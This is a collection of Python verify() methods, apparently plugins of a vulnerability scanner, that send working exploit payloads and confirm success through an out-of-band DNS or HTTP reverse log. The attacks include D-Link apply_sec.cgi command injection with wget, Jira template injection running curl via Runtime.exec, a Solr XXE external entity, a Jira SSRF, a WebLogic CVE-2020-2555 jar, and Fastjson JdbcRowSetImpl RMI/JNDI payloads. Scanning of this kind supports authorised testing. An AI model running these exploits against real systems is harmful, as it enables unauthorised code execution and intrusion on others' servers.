def verify(self):
# 限定一下目录深度,reverse还是严格点
if self.url.count("/") != 3:
return
reverse_urls, hexdata_url = generate_reverse_payloads(self.name)
reverse_dnscmd, hexdata_dns = generate_reverse_payloads(
self.name, "dns")
# reverse_urls_ = filter(lambda x: x.startswith("curl") or x.startswith("wget"), reverse_urls)
tasks = reverse_dnscmd + reverse_urls
mythread(self.run, tasks)
sleep = True
for hexdata in [hexdata_url, hexdata_dns]:
query_res, _ = query_reverse(hexdata, sleep)
sleep = False
if query_res:
parser_ = dictdata_parser(self.dictdata)
self.result.append({
"name": self.name,
"url": self.url,
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"others:": "{} in dnslog".format(hexdata),
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
break
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
reverse_urls, hexdata_url = generate_reverse_payloads(self.name)
reverse_dnscmd, hexdata_dns = generate_reverse_payloads(self.name, "dns")
tasks = reverse_dnscmd + reverse_urls
for task in tasks:
self.exploit(task) # 存在delete task,单线程比较好
if self.isnifi:
sleep = True
for hexdata in [hexdata_url, hexdata_dns]:
query_res, _ = query_reverse(hexdata, sleep)
sleep = False
if query_res:
parser_ = dictdata_parser(self.dictdata)
self.result.append({
"name": self.name,
"url": self.url,
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"others:": "{} in dnslog".format(hexdata),
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
break
def verify(self):
if self.dictdata.get("url").get("extension") not in "":
return
if not self.can_output(self.parse.getrootpath() +
self.name): # 限定只输出一次
return
self.parse = dictdata_parser(self.dictdata)
reqs = []
params = self.dictdata.get("request").get("params").get("params_url")
# body为urlencode类型
if self.dictdata.get("request").get(
"content_type") == 1: # data数据类型为urlencode
params += self.dictdata.get("request").get("params").get(
"params_body")
# gen,payload 具体参数自己慢慢测试吧,没标定是那个参数
cmds = []
payloads_, hexdata = generate_reverse_payloads(self.name)
_, dnshexdata = generate_reverse_payloads(self.name, "dns")
for payload in payloads_:
cmds.append(payload)
cmds.append(
payload.replace(reverse_set.get("reverse_http_ip"),
dnshexdata))
for param in params:
for cmd in cmds:
for payload, func in self.payloads:
payload = payload % (func(cmd))
req = self.parse.getreqfromparam(param, "a", payload,
False)
reqs.append(req)
# send it
mythread(self.send, reqs)
# query
sleep = True
for hexdata in [hexdata, dnshexdata]:
query_res, _ = query_reverse(hexdata, sleep)
sleep = False
if query_res:
self.result.append({
"name": self.name,
"url": self.parse.getrootpath(),
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"others:": "{} in dnslog".format(hexdata),
"request": self.parse.getrequestraw(),
"response": self.parse.getresponseraw()
}
})
self.can_output(self.parse.getrootpath() + self.name, True)
break
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
cmds, hexdata = generate_reverse_payloads("dlink-cve-2019-16920-rce" + self.url)
url = cmds[0].split(" ")[-1]
req = {
"method": "POST",
"url": self.url + "apply_sec.cgi",
"headers": {
"Content-Type": "application/x-www-form-urlencoded",
},
"data": '''html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20{}'''.format(
url),
"timeout": 10,
"verify": False,
"allow_redirects": False
}
r = request(**req)
res, resdata = query_reverse(hexdata)
if r != None and res:
parser_ = response_parser(r)
self.result.append({
"name": self.name,
"url": parser_.geturl(),
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"others":"{} in reverse data".format(hexdata),
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
def generatepayload(self, info, type):
cmds, hexdata = generate_reverse_payloads(info, type)
if type == "http":
url = cmds[0].split(" ", 1)[1]
else:
url = "http://" + cmds[0].split(" ")[-1]
return url, hexdata
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
reverse_urls, reverse_data = generate_reverse_payloads(self.name)
_, dns_data = generate(self.name, "dns")
tasks = []
for reverse_url in reverse_urls:
for cmd in [reverse_url, reverse_url.replace(reverse_set.get("reverse_http_ip", ""), dns_data)]:
for path in ["", "securityRealm/user/admin/"]:
tasks.append((cmd, path))
mythread(self.run, list(set(tasks)))
sleep = True
for hexdata in [reverse_data, dns_data]:
query_res, _ = query_reverse(hexdata, sleep)
sleep = False
if query_res:
parser_ = dictdata_parser(self.dictdata)
self.result.append({
"name": self.name,
"url": self.url,
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"others:": "{} in dnslog".format(hexdata),
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
break
def get_cmds(self):
datas = []
for method in ["http", "dns"]:
random_str = get_random_str(8)
cmds_, hexdata_ = generate_reverse_payloads(random_str, method)
for cmd in cmds_:
datas.append((cmd, hexdata_))
return datas
def verify(self):
# 限定一下目录深度,涉及反连,谨慎点
if self.url.count("/") != 3:
return
# 验证是否是xxl-job
req = {
"method": "POST",
"url": self.url + "run",
"headers": {
"Content-Type": "application/json"
},
"allow_redirects": False,
"verify": False,
"timeout": 10
}
r = request(**req)
if r is not None and b"com.xxl.job.core.server" in r.content:
reverse_urls, hexdata_url = generate_reverse_payloads(self.name)
reverse_dnscmd, hexdata_dns = generate_reverse_payloads(
self.name, "dns")
# reverse_urls_ = filter(lambda x: x.startswith("curl") or x.startswith("wget"), reverse_urls)
tasks = reverse_dnscmd + reverse_urls
mythread(self.run, tasks)
sleep = True
for hexdata in [hexdata_url, hexdata_dns]:
query_res, _ = query_reverse(hexdata, sleep)
sleep = False
if query_res:
parser_ = dictdata_parser(self.dictdata)
self.result.append({
"name": self.name,
"url": self.url,
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"others:": "{} in dnslog".format(hexdata),
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
break
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
req = {
"method": "GET",
"url": self.url + "solr/admin/cores?wt=json",
"headers": self.dictdata.get("request").get("headers"), # 主要保留cookie等headers
"timeout": 10,
"allow_redirects": False,
"verify": False,
}
r = request(**req)
if r != None and r.status_code == 200 and b"responseHeader" in r.content:
name = re.search('"name":"(.*?)"', r.text)
if name:
name = name.group(1)
reverse_data = generate_reverse_payloads("solr_xxe")
url = reverse_data[0][0].split(" ", 1)[1]
req["url"] = self.url + '''solr/{name}/select?q=<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "{url}">
%remote;]>
<root/>&wt=xml&defType=xmlparser'''.format(name=name, url=url)
r1 = request(**req)
query_res,data=query_reverse(reverse_data[1])
if query_res:
request_ = ""
response_ = ""
if r1 != None:
parser_ = response_parser(r1)
request_ = parser_.getrequestraw()
response_ = parser_.getresponseraw()
self.result.append({
"name": self.name,
"url": self.url,
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"payload": req["url"].encode(),
"vulmsg": self.vulmsg,
"request": request_,
"response": response_
}
})
else:
self.result.append({
"name": self.name,
"url": self.url,
"level": 0, # 0:Low 1:Medium 2:High
"detail": {
"payload": req["url"].encode(),
"vulmsg": "target open solr ,target :{}".format(self.url + "solr/admin/cores?wt=json"),
}
})
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
# 验证是否是saltstack
req = {
"method": "GET",
"url": self.url,
"allow_redirects": False,
"verify": False,
"timeout": 10
}
r = request(**req)
if r is not None and b"local_async" in r.content and b"local_batch" in r.content:
reverse_urls, hexdata_url = generate_reverse_payloads(self.name)
reverse_dnscmd, hexdata_dns = generate_reverse_payloads(
self.name, "dns")
# reverse_urls_ = filter(lambda x: x.startswith("curl") or x.startswith("wget"), reverse_urls)
tasks = reverse_dnscmd + reverse_urls
mythread(self.run, tasks)
sleep = True
for hexdata in [hexdata_url, hexdata_dns]:
query_res, _ = query_reverse(hexdata, sleep)
sleep = False
if query_res:
parser_ = dictdata_parser(self.dictdata)
self.result.append({
"name": self.name,
"url": self.url,
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"others:": "{} in dnslog".format(hexdata),
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
break
def generatepayloads(self):
'''
代码有点冗杂
'''
payloads = {"win": [], "linux": [], "hexdata": []}
for method in ["http", "dns"]:
cmds, hexdata = generate_reverse_payloads("201710271" + self.url,
method)
for cmd in cmds:
if cmd.startswith("wget") or cmd.startswith(
"curl") or cmd.startswith("ping -c"):
payloads["linux"].append(cmd)
else:
payloads["win"].append(cmd)
payloads["hexdata"].append(hexdata)
return payloads
def verify(self):
if not self.check_rule(self.dictdata, self.require): # 检查是否满足测试条件
return
# 判断weblogic
if "weblogic" not in "".join(
self.dictdata.get("service").values()).lower():
return
jarfile = os.path.join(paths.MYSCAN_HOSTSCAN_BIN, "weblogic",
"CVE-2020-2555.jar")
_, dnshexdata = generate(self.addr + get_random_str(6), "dns")
protocol = "https" if "https" in "".join(
self.dictdata.get("service").keys()) else "http"
for cmd in ("ping -c 2", "ping -n 2"):
start_process([
"java", "-jar", jarfile,
"{protocol}://{addr}:{port}/".format(protocol=protocol,
**self.dictdata),
"{} {}".format(cmd, dnshexdata)
])
payloads, httphexdata = generate_reverse_payloads(
self.addr + "cve_2020_2555", "http")
for cmd in payloads:
start_process([
"java", "-jar", jarfile,
"{protocol}://{addr}:{port}/".format(protocol=protocol,
**self.dictdata),
"{}".format(cmd)
])
for i, hexdata in enumerate((dnshexdata, httphexdata)):
sleep = True if i == 0 else False
res, data = query_reverse(dnshexdata, sleep)
if res:
self.result.append({
"name":
self.name,
"url":
"tcp://{}:{}".format(self.addr, self.port),
"level":
self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"others": "found {} in reverse log ".format(dnshexdata)
}
})
break
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
url = "{protocol}://{host}:{port}".format(**self.dictdata.get("url"))
reverse_url, reverse_data = generate_reverse_payloads("jira_ssrf")
reverse_url = reverse_url[0].split(" ")[1]
req = {
"method":
"GET",
"headers": {
"X-Atlassian-Token": "no-check",
},
"url":
self.url + "plugins/servlet/gadgets/makeRequest?url={}@{}".format(
url, reverse_url),
"allow_redirects":
True,
"verify":
False,
"timeout":
10
}
r = request(**req)
if r != None and b"don't be evil" in r.content:
res, res_data = query_reverse(reverse_data)
if res:
parser_ = response_parser(r)
self.result.append({
"name": self.name,
"url": self.url,
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
reverse_url, reverse_data = generate_reverse_payloads("jira_ssrf")
reverse_url = reverse_url[0].split(" ")[1]
req = {
"method": "GET",
"url": self.url + "secure/ContactAdministrators!default.jspa",
"allow_redirects": False,
"verify": False,
"timeout": 10
}
r = request(**req)
if r != None and r.status_code == 200:
res = re.search('name="atlassian-token" content="(?P<token>.+?)"',
r.text)
if res:
token = res.groupdict().get('token')
req["url"] = self.url + "secure/ContactAdministrators.jspa"
req["method"] = "POST"
req["data"] = "from=admin%40163.com&subject=%24i18n.getClass%28%29.forName%28%27java.lang.Runtime%27%29.getMethod%28%27getRuntime%27%2Cnull%29.invoke%28null%2Cnull%29.exec%28%curl+{reverseUrl}+%27%29.waitFor%28%29&details=exange%20website%20links&atl_token={token}&%E5%8F%91%E9%80%81=%E5%8F%91%E9%80%81".format(
reverseUrl=quote(reverse_url), token=token)
r1 = request(**req)
if r1 != None and r1.status_code == 302:
query_res, query_data = query_reverse(reverse_data)
if query_res:
parser_ = response_parser(r)
self.result.append({
"name": self.name,
"url": self.url,
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
def verify(self):
# 限定一下目录深度,reverse还是严格点
if self.url.count("/") != 3:
return
reverse_urls, reverse_data = generate_reverse_payloads(self.name)
# reverse_urls_ = filter(lambda x: x.startswith("curl") or x.startswith("wget"), reverse_urls)
_, dns_data = generate(self.name, "dns")
tasks = []
for reverse_url in reverse_urls:
for cmd in [
reverse_url,
reverse_url.replace(reverse_set.get("reverse_http_ip", ""),
dns_data)
]:
tasks.append(cmd)
mythread(self.run, tasks)
sleep = True
for hexdata in [reverse_data, dns_data]:
query_res, _ = query_reverse(hexdata, sleep)
sleep = False
if query_res:
parser_ = dictdata_parser(self.dictdata)
self.result.append({
"name": self.name,
"url": self.url,
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"others:": "{} in dnslog".format(hexdata),
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
break
def verify(self):
if self.dictdata.get("url").get("extension").lower() in notAcceptedExt:
return
if not self.dictdata.get("request").get("content_type") == 4: # data数据类型为json
return
parse = dictdata_parser(self.dictdata)
#1.2.24 dnslog 测试
payload = '''
"%s":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://%s:80/%s",
"autoCommit":true
},'''
domain_ = generate_reverse_payloads(self.dictdata.get("url").get("url").split("?")[0], "dns")[1] # 获取请求的域名
payload = payload % (
get_random_str(6).lower(), domain_, get_random_str(5).lower()) # 格式化payload
body_withpayload = parse.addpayloadtobody(parse.getrequestbody(), payload.encode(), b"{") # 在body中插入payload
if body_withpayload: # 判断是否成功
req = parse.generaterequest({"data": body_withpayload, "timeout": 10})
r = request(**req)
self.save(r,domain_,"fastjson 1.2.24 dns test")
#1.2.24 rmi 连接测试
payload = '''
"%s":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"%s",
"autoCommit":true
},''' # 因为是插入到第一个key前面,所以最后一个逗号,双引号也是json标准规定
rmi_address,hexdata = generate_reverse_payloads(self.dictdata.get("url").get("url").split("?")[0], "rmi") # 获取请求的域名
for rmi_addr in rmi_address:
payload_ = payload % (get_random_str(4).lower(), rmi_addr)
body_withpayload=parse.addpayloadtobody(parse.getrequestbody(),payload_.encode(),b"{")
if body_withpayload: # 判断是否成功
req = parse.generaterequest({"data": body_withpayload, "timeout": 10})
r = request(**req)
self.save(r, hexdata,"fastjson 1.2.24 rmi test")
#1.2.47 dns 测试
payload = '''
"%s":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"%s":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://%s:80/%s",
"autoCommit":true
},''' # 因为是插入到第一个key前面,所以最后一个逗号,双引号也是json标准规定
domain_ = generate_reverse_payloads(self.dictdata.get("url").get("url").split("?")[0], "dns")[1] # 获取请求的域名
payload = payload % (
get_random_str(6).lower(), get_random_str(6).lower(), domain_, get_random_str(5).lower()) # 格式化payload
body_withpayload = parse.addpayloadtobody(parse.getrequestbody(), payload.encode(), b"{") # 在body中插入payload
if body_withpayload: # 判断是否成功
req = parse.generaterequest({"data": body_withpayload, "timeout": 10})
r = request(**req)
self.save(r,domain_,"fastjson 1.2.47 dns test")
#1.2.47 rmi 测试
payload = '''
"%s":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"%s":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"%s",
"autoCommit":true
},''' # 因为是插入到第一个key前面,所以最后一个逗号,双引号也是json标准规定
rmi_address, hexdata = generate_reverse_payloads(self.dictdata.get("url").get("url").split("?")[0],
"rmi") # 获取请求的域名
for rmi_addr in rmi_address:
payload_ = payload % (get_random_str(4).lower(),get_random_str(4).lower(), rmi_addr)
body_withpayload = parse.addpayloadtobody(parse.getrequestbody(), payload_.encode(), b"{")
if body_withpayload: # 判断是否成功
req = parse.generaterequest({"data": body_withpayload, "timeout": 10})
r = request(**req)
self.save(r, hexdata, "fastjson 1.2.47 rmi test")
